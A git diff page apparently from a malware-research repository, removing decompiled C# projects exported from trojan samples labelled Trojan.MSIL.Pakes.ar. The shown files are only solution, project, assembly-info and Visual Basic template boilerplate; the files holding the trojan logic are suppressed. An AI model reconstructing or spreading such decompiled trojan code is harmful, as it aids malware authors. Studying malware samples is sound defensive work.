{D8F28A04-9D79-44FC-8C85-AE2F73816288}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
|
||||||
{D8F28A04-9D79-44FC-8C85-AE2F73816288}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
|
||||||
{D8F28A04-9D79-44FC-8C85-AE2F73816288}.Release|Any CPU.Build.0 = Release|Any CPU
|
|
||||||
EndGlobalSection
|
|
||||||
GlobalSection(SolutionProperties) = preSolution
|
|
||||||
HideSolutionNode = FALSE
|
|
||||||
EndGlobalSection
|
|
||||||
EndGlobal
|
|
File diff suppressed because it is too large
Load Diff
File diff suppressed because one or more lines are too long
@ -1,7 +0,0 @@
|
|||||||
using System.Reflection;
|
|
||||||
|
|
||||||
[assembly: AssemblyFileVersion("0.2.5.6")]
|
|
||||||
[assembly: AssemblyCopyright("XxTJlDjHiIildYf")]
|
|
||||||
[assembly: AssemblyTrademark("SxYSIZpnUOKgpFH")]
|
|
||||||
[assembly: AssemblyProduct("aAMKEpsUofEbuzZ")]
|
|
||||||
[assembly: AssemblyVersion("0.2.5.6")]
|
|
@ -1,18 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: My.MyApplication
|
|
||||||
// Assembly: server4, Version=0.2.5.6, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: D3D40A2A-DCEA-427F-BF12-5D3333A81FA3
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.MSIL.Pakes.ar-10b13be0906d9530b2828a7f818438304a086da63cba668d4c9c3f12694c8154.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic.ApplicationServices;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
|
|
||||||
namespace My
|
|
||||||
{
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[GeneratedCode("MyTemplate", "8.0.0.0")]
|
|
||||||
internal class MyApplication : ApplicationBase
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,24 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: My.MyComputer
|
|
||||||
// Assembly: server4, Version=0.2.5.6, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: D3D40A2A-DCEA-427F-BF12-5D3333A81FA3
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.MSIL.Pakes.ar-10b13be0906d9530b2828a7f818438304a086da63cba668d4c9c3f12694c8154.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic.Devices;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.Diagnostics;
|
|
||||||
|
|
||||||
namespace My
|
|
||||||
{
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[GeneratedCode("MyTemplate", "8.0.0.0")]
|
|
||||||
internal class MyComputer : Computer
|
|
||||||
{
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public MyComputer()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,108 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: My.MyProject
|
|
||||||
// Assembly: server4, Version=0.2.5.6, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: D3D40A2A-DCEA-427F-BF12-5D3333A81FA3
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.MSIL.Pakes.ar-10b13be0906d9530b2828a7f818438304a086da63cba668d4c9c3f12694c8154.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic;
|
|
||||||
using Microsoft.VisualBasic.ApplicationServices;
|
|
||||||
using Microsoft.VisualBasic.CompilerServices;
|
|
||||||
using System;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.ComponentModel.Design;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
|
|
||||||
namespace My
|
|
||||||
{
|
|
||||||
[GeneratedCode("MyTemplate", "8.0.0.0")]
|
|
||||||
[HideModuleName]
|
|
||||||
[StandardModule]
|
|
||||||
internal sealed class MyProject
|
|
||||||
{
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
|
|
||||||
|
|
||||||
[HelpKeyword("My.Computer")]
|
|
||||||
internal static MyComputer Computer
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.Application")]
|
|
||||||
internal static MyApplication Application
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.User")]
|
|
||||||
internal static User User
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.WebServices")]
|
|
||||||
internal static MyProject.MyWebServices WebServices
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
|
|
||||||
internal sealed class MyWebServices
|
|
||||||
{
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public override int GetHashCode() => base.GetHashCode();
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
internal new Type GetType() => typeof (MyProject.MyWebServices);
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public override string ToString() => base.ToString();
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public MyWebServices()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[ComVisible(false)]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal sealed class ThreadSafeObjectProvider<T> where T : new()
|
|
||||||
{
|
|
||||||
internal T GetInstance
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get
|
|
||||||
{
|
|
||||||
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
|
|
||||||
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
|
|
||||||
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public ThreadSafeObjectProvider()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,46 +0,0 @@
|
|||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
|
||||||
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.MSIL.Pakes.ar-10b13be0906d9530b2828a7f818438304a086da63cba668d4c9c3f12694c8154.exe-->
|
|
||||||
<PropertyGroup>
|
|
||||||
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
|
|
||||||
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
|
|
||||||
<ProjectGuid>{1A2A3643-D621-4E96-B160-9B9CD9AA6053}</ProjectGuid>
|
|
||||||
<OutputType>WinExe</OutputType>
|
|
||||||
<AssemblyName>server4</AssemblyName>
|
|
||||||
<ApplicationVersion>0.2.5.6</ApplicationVersion>
|
|
||||||
<RootNamespace>My</RootNamespace>
|
|
||||||
</PropertyGroup>
|
|
||||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
|
|
||||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
|
||||||
<DebugSymbols>true</DebugSymbols>
|
|
||||||
<DebugType>full</DebugType>
|
|
||||||
<Optimize>false</Optimize>
|
|
||||||
<OutputPath>bin\Debug\</OutputPath>
|
|
||||||
<DefineConstants>DEBUG;TRACE</DefineConstants>
|
|
||||||
<ErrorReport>prompt</ErrorReport>
|
|
||||||
<WarningLevel>4</WarningLevel>
|
|
||||||
</PropertyGroup>
|
|
||||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
|
|
||||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
|
||||||
<DebugType>pdbonly</DebugType>
|
|
||||||
<Optimize>true</Optimize>
|
|
||||||
<OutputPath>bin\Release\</OutputPath>
|
|
||||||
<DefineConstants>TRACE</DefineConstants>
|
|
||||||
<ErrorReport>prompt</ErrorReport>
|
|
||||||
<WarningLevel>4</WarningLevel>
|
|
||||||
</PropertyGroup>
|
|
||||||
<ItemGroup>
|
|
||||||
<Reference Include="Microsoft.VisualBasic" />
|
|
||||||
<Reference Include="System" />
|
|
||||||
<Reference Include="System.Windows.Forms" />
|
|
||||||
</ItemGroup>
|
|
||||||
<ItemGroup>
|
|
||||||
<Compile Include="WNblUUHtUqESyQD.cs" />
|
|
||||||
<Compile Include="vOLhRciepHIdeoM.cs" />
|
|
||||||
<Compile Include="MyApplication.cs" />
|
|
||||||
<Compile Include="MyComputer.cs" />
|
|
||||||
<Compile Include="MyProject.cs" />
|
|
||||||
<Compile Include="AssemblyInfo.cs" />
|
|
||||||
</ItemGroup>
|
|
||||||
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
|
|
||||||
</Project>
|
|
@ -1,20 +0,0 @@
|
|||||||
|
|
||||||
Microsoft Visual Studio Solution File, Format Version 9.00
|
|
||||||
# Visual Studio 2005
|
|
||||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "server4", "Trojan.MSIL.Pakes.ar-10b13be0906d9530b2828a7f818438304a086da63cba668d4c9c3f12694c8154.csproj", "{1A2A3643-D621-4E96-B160-9B9CD9AA6053}"
|
|
||||||
EndProject
|
|
||||||
Global
|
|
||||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
|
||||||
Debug|Any CPU = Debug|Any CPU
|
|
||||||
Release|Any CPU = Release|Any CPU
|
|
||||||
EndGlobalSection
|
|
||||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
|
||||||
{1A2A3643-D621-4E96-B160-9B9CD9AA6053}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
|
||||||
{1A2A3643-D621-4E96-B160-9B9CD9AA6053}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
|
||||||
{1A2A3643-D621-4E96-B160-9B9CD9AA6053}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
|
||||||
{1A2A3643-D621-4E96-B160-9B9CD9AA6053}.Release|Any CPU.Build.0 = Release|Any CPU
|
|
||||||
EndGlobalSection
|
|
||||||
GlobalSection(SolutionProperties) = preSolution
|
|
||||||
HideSolutionNode = FALSE
|
|
||||||
EndGlobalSection
|
|
||||||
EndGlobal
|
|
File diff suppressed because one or more lines are too long
File diff suppressed because it is too large
Load Diff
@ -1,7 +0,0 @@
|
|||||||
using System.Reflection;
|
|
||||||
|
|
||||||
[assembly: AssemblyCopyright("nOyqTUdIDXPhbnv")]
|
|
||||||
[assembly: AssemblyFileVersion("9.9.4.2")]
|
|
||||||
[assembly: AssemblyTrademark("EMufKtrzbWkKuMP")]
|
|
||||||
[assembly: AssemblyProduct("bNprclHsAEbAqhS")]
|
|
||||||
[assembly: AssemblyVersion("9.9.4.2")]
|
|
File diff suppressed because one or more lines are too long
@ -1,18 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: My.MyApplication
|
|
||||||
// Assembly: Server, Version=9.9.4.2, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 5CDF49B2-A4AF-4C8F-A00E-8C21695707AD
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.MSIL.Pakes.ar-b84e3b03559cb0d69e6a88acaae00e1a5f84577be40491b76da343a7b5d80727.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic.ApplicationServices;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
|
|
||||||
namespace My
|
|
||||||
{
|
|
||||||
[GeneratedCode("MyTemplate", "8.0.0.0")]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal class MyApplication : ApplicationBase
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user